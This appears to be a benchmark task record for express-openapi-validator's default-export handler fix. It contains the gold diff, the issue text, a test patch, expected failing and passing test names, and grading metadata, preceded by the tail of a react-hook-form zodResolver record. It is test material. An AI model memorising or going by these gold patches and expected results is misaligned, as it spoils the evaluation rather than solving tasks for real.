validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should correctly infer the output type from a arktype schema", "arktype/src/__tests__/arktype.ts > arktypeResolver > should correctly infer the output type from a arktype schema using a transform", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when requirement fails", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when walidation fails", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with `validateAllFieldCriteria` set to true", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should correctly infer the output type from a io-ts schema", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should correctly infer the output type from a io-ts schema using a transform", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return values from effectTsResolver when validation pass", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return a single error from effectTsResolver when validation fails", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return the first error from effectTsResolver when validation fails with `validateAllFieldCriteria` set to firstError", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return all the errors from effectTsResolver when validation fails with `validateAllFieldCriteria` set to true", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should correctly infer the output type from a effectTs schema", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should correctly infer the output type from a effectTs schema using a transform", "fluentvalidation-ts/src/__tests__/Form-native-validation.tsx > form's native validation with fluentvalidation-ts", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Typebox", "typebox/src/__tests__/Form-native-validation-compiler.tsx > form's native validation with Typebox (with compiler)", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when some properties are undefined", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Arktype", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when requirement fails", "standard-schema/src/__tests__/Form-native-validation.tsx > form's native validation with arkType", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "typebox/src/__tests__/Form-compiler.tsx > form's validation with Typebox (with compiler) and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when walidation fails", "nope/src/__tests__/Form-native-validation.tsx > form's native validation with Nope", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when some properties are undefined", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts", "effect-ts/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "effect-ts/src/__tests__/Form-native-validation.tsx > form's native validation with effect-ts", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver with `mode: sync` when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver with `mode: sync` when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass & raw=true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with names option", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array", "src/__tests__/toNestErrors.ts > ensures consistent ordering when a field array has a root error and an error in the non-first element", "src/__tests__/toNestErrors.ts > should correctly validate object with special characters", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should validate with success", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "vine/src/__tests__/Form.tsx > form's validation with Vine and TypeScript's integration", "typebox/src/__tests__/Form.tsx > form's validation with Typebox and TypeScript's integration", "standard-schema/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration" ]
Function: zodResolver(schema: Zod3Type<Output, Input>, schemaOptions?: Zod3ParseParams, resolverOptions?: { mode?: 'async'|'sync'; raw?: false }) Location: zod/src/zod.ts Inputs: - **schema** – Zod v3 schema (`z3.ZodSchema`) whose generic `<Output, Input>` describe the parsed output and raw input types. - **schemaOptions** – Optional parse‑options object matching `z3.ParseParams` (or a fallback shape for pre‑3.25 versions) such as `async`, `path`, `errorMap`, etc. - **resolverOptions** – Optional resolver configuration; `mode` selects `'async'` (default) or `'sync'`; `raw` defaults to `false`. Outputs: `Resolver<Input, Context, Output>` – a resolver that validates the form values and returns the parsed Zod output (`Output`) when validation succeeds, otherwise a `ResolverError` with nested field errors. Description: Creates a React‑Hook‑Form resolver that validates form data using a Zod v3 schema. When `raw` is true the original values are returned; otherwise the transformed Zod output is returned. Function: zodResolver(schema: Zod3Type<Output, Input>, schemaOptions?: Zod3ParseParams, resolverOptions: { mode?: 'async'|'sync'; raw: true }) Location: zod/src/zod.ts Inputs: - Same as above, but **resolverOptions.raw** is required to be `true`. Outputs: `Resolver<Input, Context, Input>` – a resolver that returns the original unparsed input values on successful validation. Description: Variant of the Zod v3 resolver that forces the raw form values to be returned even if the schema performs transforms. Function: zodResolver<T extends z4.$ZodType<Output, Input>>(schema: T, schemaOptions?: Zod4ParseParams, resolverOptions?: { mode?: 'async'|'sync'; raw?: false }) Location: zod/src/zod.ts Inputs: - **schema** – Zod v4 schema (`z4.$ZodType`) with generic `<Output, Input>`. - **schemaOptions** – Optional parse‑options matching Zod v4 `ParseContext` (or a fallback shape) such as `jitless`, `reportInput`, `error`. - **resolverOptions** – Optional resolver configuration; `mode` selects `'async'` (default) or `'sync'`; `raw` defaults to `false`. Outputs: `Resolver<z4.input<T>, Context, z4.output<T>>` – a resolver that validates using the Zod v4 schema and returns the parsed output type (`z4.output<T>`). Description: Provides a resolver for Zod v4 schemas, preserving transformed output types while supporting async or sync validation modes. Function: zodResolver<T extends z4.$ZodType<Output, Input>>(schema: T, schemaOptions?: Zod4ParseParams, resolverOptions: { mode?: 'async'|'sync'; raw: true }) Location: zod/src/zod.ts Inputs: - Same as above, with **resolverOptions.raw** forced to `true`. Outputs: `Resolver<z4.input<T>, Context, z4.input<T>>` – a resolver that returns the raw input values from a Zod v4 schema, ignoring any schema transforms. Description: Variant of the Zod v4 resolver that forces the raw form values to be returned, useful when the consumer wants untransformed data.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 5, "num_modified_lines": 234, "pr_author": "colinhacks", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [ "https://github.com/colinhacks/zod/issues/4371" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding Zod 4 support to the resolver, describing the version bump, subpath imports, and compatibility expectations. The provided test patch updates imports and adds comprehensive v3 and v4 test suites that directly verify the new behavior, so the tests align with the stated requirements. No signals of test suite coupling, implicit naming, missing specs, or external undocumented dependencies are present. Therefore the task is a well‑specified feature implementation and qualifies as SOLVABLE (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
8db56ae0dd4062a0a3becb5b36203fa929b835b5
2021-11-28 10:48:35
cdimascio: @zzgab thanks. This looks good. Please add the tsignore and I’ll get this merged zzgab: Updated. Thanks.
cdimascio__express-openapi-validator-675
diff --git a/src/resolvers.ts b/src/resolvers.ts index 7d7445f..68dd21b 100644 --- a/src/resolvers.ts +++ b/src/resolvers.ts @@ -33,18 +33,16 @@ export function defaultResolver( const modulePath = path.join(handlersPath, baseName); if (!tmpModules[modulePath]) { tmpModules[modulePath] = require(modulePath); - if (!tmpModules[modulePath][oId]) { - // if oId is not found only module, try the module's default export - tmpModules[modulePath] = tmpModules[modulePath].default; - } } - if (!tmpModules[modulePath][oId]) { + + const handler = tmpModules[modulePath][oId] || tmpModules[modulePath].default; + + if (!handler) { throw Error( - `Could not find 'x-eov-operation-handler' with id ${oId} in module '${modulePath}'. Make sure operation '${oId}' defined in your API spec exists as a handler function in '${modulePath}'.`, + `Could not find 'x-eov-operation-handler' with id ${oId} in module '${modulePath}'. Make sure operation '${oId}' defined in your API spec exists as a handler function (or module has a default export) in '${modulePath}'.`, ); } - const handler = tmpModules[modulePath][oId]; cache[cacheKey] = handler; return handler; }
#671 default export in handler Hi, issue #671 I wasn't sure whether to add the `x-eov-operation-handler` optional property in `OperationObject` interface (since it has an important meaning in the program). If you think it does not belong, we could instead use a `// @ts-ignore` comment in my new test before line 21. Thanks
**Title** Support default export handlers in operation resolver **Problem** The resolver could not locate a handler when a module used a default export, leading to missing‐handler errors at runtime. Existing error messages did not clarify the default export case. **Root Cause** The resolver overwrote the required module with its default export and only checked for a named handler, preventing proper fallback to the default export. **Fix / Expected Behavior** - Resolve a handler by first looking for the named operation identifier, then falling back to the module’s default export. - Preserve the original module object to avoid losing other exports. - Throw a clear error when neither a named handler nor a default export is found, mentioning both possibilities. - Maintain existing caching behavior for resolved handlers. **Risk & Validation** - Verify that existing named‑export handlers continue to work unchanged. - Add tests covering modules that export a handler as default and confirm they are resolved correctly. - Ensure the updated error message is triggered only when no handler is present.
675
cdimascio/express-openapi-validator
diff --git a/test/default-export.spec.ts b/test/default-export.spec.ts new file mode 100644 index 0000000..6b4cd2f --- /dev/null +++ b/test/default-export.spec.ts @@ -0,0 +1,46 @@ +import * as express from 'express'; +import * as OpenApiValidator from '../src'; +import { expect } from 'chai'; +import * as request from 'supertest'; +import * as path from 'path'; + +describe('default export resolver', () => { + let server = null; + let app = express(); + + before(async () => { + app.use( + OpenApiValidator.middleware({ + apiSpec: { + openapi: '3.0.0', + info: { version: '1.0.0', title: 'test bug OpenApiValidator' }, + paths: { + '/': { + get: { + operationId: 'anything', + // @ts-ignore + 'x-eov-operation-handler': 'controller-with-default', + responses: { 200: { description: 'home api' } } + } + }, + }, + }, + operationHandlers: path.join(__dirname, 'resources'), + }), + ); + + server = app.listen(3000); + console.log('server start port 3000'); + }); + + after(async () => server.close()); + + it('should use default export operation', async () => { + return request(app) + .get(`/`) + .expect(200) + .then((r) => { + expect(r.body).to.have.property('success').that.equals(true); + }); + }); +}); diff --git a/test/resources/controller-with-default.ts b/test/resources/controller-with-default.ts new file mode 100644 index 0000000..b52090a --- /dev/null +++ b/test/resources/controller-with-default.ts @@ -0,0 +1,3 @@ +export default function (req, res) { + res.json({success: true}).end(); +}
[ "should use default export operation" ]
[ "create campaign should return 201", "create campaign should return 400", "create campaign should return 200", "should return 200", "should return 201", "does not mutate the API specification", "does not validate responses which are not present in the spec", "should allow additional / unknown properties properties", "should return 400 on missing required prop (when using additional props explode object)", "should return 400 if additionalProperties=false, and type is invalid", "should return 400 if additionalProperties=false, but extra props sent", "should return 200 if additonalProperities=true and extra props are sent", "should not validate schema for requests since schema is validated on startup", "should not validate schema for response since schema is validated on startup", "should not validate schema for preprocessor since schema is validated on startup", "should not validate schema for multipar since schema is validated on startup", "should set serdes deserialize", "should set serdes serialize", "should set serdes serialize and deserialize", "should set serdes serialize and deserialize separately", "should validate allOf", "should fail validation due to missing required id field", "should fail validation due to missing required name field", "adds \"Allow\" header to 405 - Method Not Allowed", "should validate circular ref successfully", "should return 400 since is_cat is passed as string not boolean", "should return 400 when age is passed as string, but number is expected", "should return 400 when age (number) is null", "should return 200 when all are typed correctly", "should keep is_cat as boolean", "should return 400 when is_cat requires string type \"true\", but boolean specified", "should handle components.parameter $refs", "should match wildcard type */*", "should match wildcard type application/*", "should null if no accept specified", "should match media type if charset is not specified in accepts", "should match media type if charset is specified in accepts, but charset not defined in schema", "should return 200 if testDateTimeProperty is provided with invalid, but correctly formatted date time and default validation is enabled (past compatibility)", "should return 400 if testDateTimeProperty is provided with incorrectly formatted date time and default validation enabled (past compatibility)", "should return 200 if testDateTimeProperty is provided with incorrectly formatted date time and format validation disabled", "should return 200 if testDateTimeProperty is provided with valid date time and full validation enabled", "should return 400 if testDateTimeProperty is provided with invalid date time and full validation enabled", "should throw 400 if servers are empty and request is malformed", "should be able to use an endpoint with some nested paths $ref", "should be able to use an endpoint with some nested paths $ref 2", "should handle float type with negative", "should handle float type with 0 value", "should handle float type with positive value", "should require the query parameter number_id has 3 digits", "should require the query parameter string_id has 3 letters", "should return success if the query parameter string_id has 3 letters", "should return 400 missing required header", "should return 400 invalid required header", "should return 200 for valid headers", "should throw 400 if required header is missing", "should find appropriate request body in spec by contentType with charset (compatibility)", "should find appropriate request body in spec by contentType with charset", "should match mediatype when charset case does not match the case defined in the spec", "should be an instance of BadRequest", "should be an instance of InternalServerError", "should be an instance of UnsupportedMediaType", "should be an instance of RequestEntityTooLarge", "should be an instance of MethodNotAllowed", "should be an instance of NotFound", "should be an instance of Unauthorized", "should be an instance of Forbidden", "should ignore path and return 200, rather than validate", "should not ignore path and return 404", "should validate a path within the base path that is not ignored", "should validate a route defined in openapi but not express with invalid params", "should return 404 if route is defined in openapi but not express and params are valid", "should propagate spec errors when validateApiSpec is true", "should fail gracefully when validateApiSpec is false", "should throw 400 when required multipart file field", "should throw 400 when required form field is missing during multipart upload", "should validate x-www-form-urlencoded form_pa and and form_p2", "should throw 405 get method not allowed", "should throw 415 unsupported media type", "should return 400 when improper range specified", "should validate a request body with a schemaObject $ref", "should validate a requestBody $ref", "should validate a requestBody $ref that contains a schemaObject $ref", "should validate application/octet-stream file and metadata", "should validate multipart file and metadata", "should fail, because response does not satisfy schema", "should pass if /components is not present", "should allow null to be set (name: nullable true)", "should not fill an explicity null with default when coerceTypes is false", "should fill unspecified field with default when coerceTypes is false", "should fail if required and not provided (nullable true)", "should fail if required and not provided (nullable false", "should fail if required and provided as null when nullable is false", "should allow nullable object", "should not coerce a nullable int", "should return 200 for dog", "should return 200 for cat and populate default color", "should return 400 for dog with cat props", "should return 400 a bad discriminator", "should return 200 for puppy", "should return 200 for cat", "should return 200 for kitty", "should return 200 for Dog", "should return 200 for Cat", "should return 200 one first oneOf option", "should return 200 one second oneOf option", "should return 400 for invalid oneOf option", "should return 200 on first oneOf (b) option", "should return 200 on second oneOf (b) option", "should return 400 for invalid oneOf (b) option", "post type anyOf (without readonly id) should pass", "post type oneOf (without readonly id) should pass", "post type anyof without providing the single required readonly property should pass", "should fail if posting anyof with bad discriminator", "should throw 400 on missing required query parameter", "should respond with json on proper get call", "should return 400 with unknown query parameter", "should return 400 when non-urlencoded JSON in query param", "should return 200 when JSON in query param", "should return 400 when improper JSON in query param", "should return 400 when comma separated array in query param", "should return 400 when comma separated array in query param is not url encoded", "should return 200 when separated array in query param", "should return 400 when improper separated array in query param", "should return 200 when array explode in query param", "should return 400 when improper array explode in query param", "should return 400 if required body is missing", "should return 400 if required \"name\" property is missing", "should return 200 when post props are met", "should not validate a route defined in express, but not under an openapi basepath", "should return 400 if route is defined in openapi but not express and is called with invalid parameters", "should return 404 if route is defined in swagger but not express", "should throw 404 on a route defined in express, but not documented in the openapi spec", "should return 405 if route is defined in swagger but not express and the method is invalid", "should return 404 for route not defined in openapi or express", "should return 404 for a route defined in express, but not documented in openapi", "should return 415 when media type is not supported", "should return 405 when method is not allows", "should return 400 when path param should be int, but instead is string", "should return 400 an invalid enum value is given", "should handle multiple path params with coereion", "should return 200 and get the id from the response", "should not install handlers when nothing provided", "should use the default handler when string provided", "can use a custom operation resolver", "should recognize mapped operation", "create document should return 201", "create document should return 201 with empty body", "return 415", "should return 400 if pathLevel query parameter is not provided", "should return 400 if operationLevel query parameter is not provided", "should return 400 if neither operationLevel, nor pathLevel query parameters are provided", "should return 200 if both pathLevel and operationLevel query parameter are provided", "should match on users test", "static routes should be matched before dynamic routes", "should url decode path parameters (type level)", "should url decode path parameters (path level)", "should handle path parameter with style=simple", "should handle :'s in path parameters", "should sort dynamic leafs after static leafs", "should sort dynamic inner paths after static inner paths", "should pass if known query params are specified", "should not fail if unknown query param is specified", "should fail if operation overrides x-allow-unknown-query-parameters=false", "should reject any query param when endpoint declares none", "should return 200 if no query params are supplied", "should fail if unknown query param is specified", "should return 200 if operation overrides x-allow-unknown-query-parameters=true", "should not allow empty query param value", "should allow empty query param value with allowEmptyValue: true", "should succeed when query param 'name' has empty value and sets allowEmptyValue: true", "should not allow reserved characters", "should may allow reserved characters when allowedReserved: true", "should not allow read only properties in requests", "should allow read only properties in responses", "should not allow read only inlined properties in requests", "should not allow read only properties in requests (nested schema $refs)", "should not allow read only properties in requests (deep nested schema $refs)", "should pass validation if required read only properties to be missing from request ($ref)", "should pass validation if required read only properties to be missing from request (inlined)", "should pass validation if required read only properties to be missing from request (with charset)", "should fail validation if required read only properties is missing from the response", "should require readonly required property in response", "should return 500 if readonly required property is missing from response", "should return 415 for undeclared media type", "should return 200 if text/plain request body is satisfied", "should return 200 if text/html request body is satisfied by */*", "should return 200 if application/ld+json request body is satisfied by application/*", "should return 200 if application/vnd.api+json; type=two request body is validated agains the corrent schema", "should return 400 if testProperty body property is not provided", "should return 200 if testProperty body property is provided", "should return 400 if array is passed (instead of object) and the array includes an object that meets requirements", "should return 200 if a json suffex is used for content-type", "should return 500 if additional response body property is returned", "should return 400 if an additional property is encountered", "should return 200 if coercion is enabled and the type is correct", "should return 200 if coercion is enabled and the type is incorrect but can be coerced", "should return 400 if coercion is enabled and the type is incorrect and cannot be coerced", "should return 200 if coercion is disabled and the type is correct", "should return 400 if coercion is disabled and the type is incorrect", "should validate and serialize date-time", "should validate and serialize date", "should be able to return `true` as the response body", "should coerce id from string to number", "should validate 200 using explicit response", "should validate undeclared 400 using default response", "custom error handler invoked if response field has a value of incorrect type", "custom error handler not invoked on valid response", "returns error if custom error handler throws", "should fail if response field has a value of incorrect type", "should remove additional properties when set false", "should remove nested additional prop if additionalProperties is false", "should pass if response is a list", "should return 200 on valid responses 200 $ref", "should fail if response is array when expecting object", "should return 200 if returns expect object (using allOf) with type object", "should fail if response is empty object", "should fail if response is empty", "should return throw 500 on invalid error response", "should return 204 for endpoints that return empty response", "should fail if response is not empty and an empty response is expected", "should fail if additional properties are provided when set false", "should pass if value is null", "should be able to return `false` as the response body", "should validate the using default (in this case the error object)", "should throw error when default response is invalid", "should return an error if field type is invalid", "should return 404 for undocumented route when using Router", "should return 200 if no security", "should skip validation, even if auth header is missing for basic auth", "should skip security validation, even if auth header is missing for bearer auth", "should return 401 if cookie auth property is missing", "should return 401 if apikey handler throws exception", "should return 401 if apikey handler returns false", "should return 401 if apikey handler returns Promise with false", "should return 401 if cookie auth handler returns Promise with false", "should return 401 if apikey handler returns Promise reject with custom message", "should return 401 if apikey header is missing", "should return 200 if apikey header exists and handler returns true", "should return 404 if apikey header exists and handler returns true but path doesnt exist", "should return 401 if auth header is missing for basic auth", "should return 401 if auth header has malformed basic auth", "should return 401 if auth header is missing for bearer auth", "should return 401 if auth header has malformed bearer auth", "should return 200 if bearer auth succeeds", "should return 200 if oauth2 auth succeeds", "should return 403 if oauth2 handler throws 403", "should return 200 if openid auth succeeds", "should return 500 if security handlers are defined, but not for all securities", "should return 200 if api_key or anonymous and no api key is supplied", "should return 200 if api_key or anonymous and api key is supplied", "should return 401 if not X-Api-Key is missing", "should return 401 if Bearer token is missing", "should return 200 when X-Api-Key and Bearer token are present", "should return 200 when Basic auth is present", "should inherit top level security and return 401 if apikey header is missing", "should return 200 if apikey exists", "should return 404 if apikey exist, but path doesnt exist", "should return 405 if apikey exist, but invalid method used", "should return 200 if apikey exist as query param", "should return 200 if apikey exist as query param with another query parmeter in the request", "should return 200 if apikey exist as query param with no query parmeter in the request but in the spec", "should return 200 if apikey or anonymous", "should override api key with bearer and return 401 if bearer is missing", "should override api key with bearer and return 200", "should override api key with anonymous", "should control BAD id format and throw an error", "should control GOOD id format and get a response in expected format", "should POST also works with deserialize on request then serialize en response", "should POST throw error on invalid schema ObjectId", "should POST throw error on invalid schema Date", "should throw error 500 on invalid object type instead of Date expected", "should POST throw error for deserialize on request of non-string format", "should explode deepObject and set default", "should explode deepObject query params", "should explode deepObject query params (optional query param)", "should use defaults when empty", "should use defaults for values not provided", "should deserialize object", "should not deserialize when non-object", "should fail on validation, not parsing", "should explode query param object e.g. tag_ids, state as query params", "should explode deepObject query params with default values", "should explode deepObject $ref query params with default values", "should validate server path with version variable, v2 and petstore", "should validate server path with version variable, v2 and storeofpets", "should skip validation of api path with invalid enum value v3, and valid value petstore", "should validate server path with version variables, v2 and petstore", "should validate server path with version variables, v2 and storeofpets", "should skip validation of api path with invalid variable value, v2, and valid variable petstore", "should return 200 for valid request with unknown format", "should allow path param without wildcard", "should allow path param with slashes \"/\" using wildcard", "should return not found if no path is specified", "should return 200 when wildcard path includes all required params", "should 400 when wildcard path is missing a required query param", "should return 200 if root of an existing wildcard route is defined", "should not allow ready only inlined properties in requests", "should not allow write only inlined properties in responses", "should return 200 if no write-only properties are in the responses", "should not allow write only properties in responses (nested schema $refs)" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "node_20", "install": [ "npm ci", "npm run compile" ], "log_parser": "parse_log_js", "test_cmd": "npx mocha -r source-map-support/register -r ts-node/register --files --recursive -R spec test/**/*.spec.ts 2>&1 | sed 's/\\x1b\\[[0-9;]*m//g'" }
{ "num_modified_files": 1, "num_modified_lines": 5, "pr_author": "zzgab", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.96, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests support for default export handlers via the optional 'x-eov-operation-handler' property. The provided test asserts that a handler exported as default is correctly resolved and returns a success response. The test aligns with the expected behavior and does not introduce unrelated requirements. No signals of B‑category problems are present, so the task is classified as solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
56f778b524f313f50b1570a50813e34474fd9f31
2021-12-24 09:55:42
